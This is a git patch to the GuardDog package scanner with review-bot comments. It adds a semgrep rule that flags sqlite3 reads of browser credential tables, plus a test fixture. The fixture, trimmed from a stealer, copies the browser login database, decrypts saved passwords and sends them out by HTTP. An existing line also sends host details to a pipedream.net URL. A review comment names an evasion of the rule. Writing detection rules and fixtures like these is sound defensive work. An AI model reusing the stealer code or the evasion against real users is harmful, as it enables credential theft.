From 8545867a71df48ce818039e9c8e8a48318db340b Mon Sep 17 00:00:00 2001
From: Ian Kretz <44385082+ikretz@users.noreply.github.com>
Date: Fri, 19 Jul 2024 12:13:50 +0200
Subject: [PATCH] Add detection for Python sqlite3 data exfiltration (#420)
* Add Python sqlite3 data exfiltration rule coverage
* Incorporate change requests
* Match only on targeted table names
---
 .../sourcecode/exfiltrate-sensitive-data.yml | 12 ++++++++++
 .../sourcecode/exfiltrate-sensitive-data.py | 23 +++++++++++++++++++
 2 files changed, 35 insertions(+)
diff --git a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
index 81887d68..605ee395 100644
--- a/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml
@@ -31,6 +31,18 @@ rules:
 - metavariable-regex:
 metavariable: $ENVVAR
 regex: ([\"\'](AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN)[\"\'])
+ - patterns:
+ - pattern-inside: |
+ $CONNECT = sqlite3.connect(...)
+ ...
+ $CURSOR = $CONNECT.cursor(...)
+ ...
+ - pattern: $CURSOR.execute($QUERY, ...)
+ - metavariable-pattern:
+ metavariable: $QUERY
+ patterns:
+ - pattern: "..."
+ - pattern-regex: (?i)(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
 pattern-sinks:
 - pattern-either:
 - pattern-inside: requests.$METHOD(...)
diff --git a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
index 80021ad8..05ba1867 100644
--- a/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
+++ b/tests/analyzer/sourcecode/exfiltrate-sensitive-data.py
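Review bot: The new taint source only fires when the query goes through an explicitly assigned cursor (`$CURSOR = $CONNECT.cursor(...)` in the `pattern-inside`), so a sample that uses the stdlib shortcut `conn.execute("SELECT ... FROM logins")` — `sqlite3.Connection.execute` creates the cursor implicitly — or chains `conn.cursor().execute(...)` on one line never matches the added `$CURSOR.execute($QUERY, ...)` pattern, which is the cheapest evasion a stealer author has against this rule. The `pattern: "..."` restriction on `$QUERY` additionally means a query assembled outside the call (`q = "SELECT ... FROM " + tbl; cursor.execute(q)`) is not a source; if that is an accepted precision trade-off it deserves a one-line comment in the rule, e.g. `# only literal queries: table name must be visible at the execute() call`. I would keep the connect `pattern-inside` and match the execute call on either the connection or a derived cursor, as sketched below; I have not run this against semgrep, so the nested `pattern-inside` inside `pattern-either` should be confirmed with a `conn.execute(...)` fixture.
```yaml
- patterns:
    - pattern-inside: |
        $CONNECT = sqlite3.connect(...)
        ...
    - pattern-either:
        - pattern: $CONNECT.execute($QUERY, ...)
        - patterns:
            - pattern-inside: |
                $CURSOR = $CONNECT.cursor(...)
                ...
            - pattern: $CURSOR.execute($QUERY, ...)
    # … unchanged: metavariable-pattern on $QUERY (literal + table-name regex) …
```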
@@ -226,3 +226,26 @@ def run(self):
 ploads = {'hostname':hostname,'cwd':cwd,'username':username}
 # ruleid: exfiltrate-sensitive-data
 requests.get("https://eo6ksiuyau5e5x2.m.pipedream.net",params = ploads)
+
+
+""" RULEID: sqlite3 data exfiltration
+"""
+
+def steal_passwords2(self, name: str, path: str, profile: str):
+ path = "path"
+ if not os.path.isfile(path):
+ return
+ loginvault = self.random_dir_create()
+ copy2(path, loginvault)
+ conn = sqlite3.connect(loginvault)
+ cursor = conn.cursor()
+ with open(os.path.join(self.dir, "Browsers", "All Passwords.txt"), 'a', encoding="utf-8") as f:
+ for res in cursor.execute("SELECT origin_url, username, password_value FROM logins").fetchall():
+ url, username, password = res
+ password = self.dcrpt_val(password, self.masterkey)
+ if url != "":
+ params = {'url': url, 'username': username, 'password': password}
+ # ruleid: exfiltrate-sensitive-data
+ requests.get("https://example.com", params=params)
+ cursor.close()
+ conn.close()
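Review bot: The fixture only exercises the positive path, so the "Match only on targeted table names" restriction the commit message describes has no negative counterpart and a later edit that loosens or drops the `pattern-regex` would still pass the test file. A sibling function with the same connect/cursor/`requests.get` shape that reads a non-targeted table, marked with semgrep's `# ok: exfiltrate-sensitive-data` annotation, would pin that behaviour (assuming no other source in the rule taints cursor rows). `steal_passwords2` is a module-level `def` that takes `self` and calls `self.random_dir_create`, `self.dcrpt_val`, `self.dir` and `self.masterkey`, which is fine for a never-executed semgrep fixture, but a comment such as `# trimmed from a real stealer sample; never executed, only scanned` above it would save the next reader from wondering why it cannot run. The `with open(...) as f:` handle is also never written to in the trimmed body, which is harmless but worth a word in that same comment.
```python
def read_settings(self):
    conn = sqlite3.connect("app.db")
    cursor = conn.cursor()
    for key, value in cursor.execute("SELECT key, value FROM settings").fetchall():
        # ok: exfiltrate-sensitive-data
        requests.get("https://example.com", params={"key": key, "value": value})
```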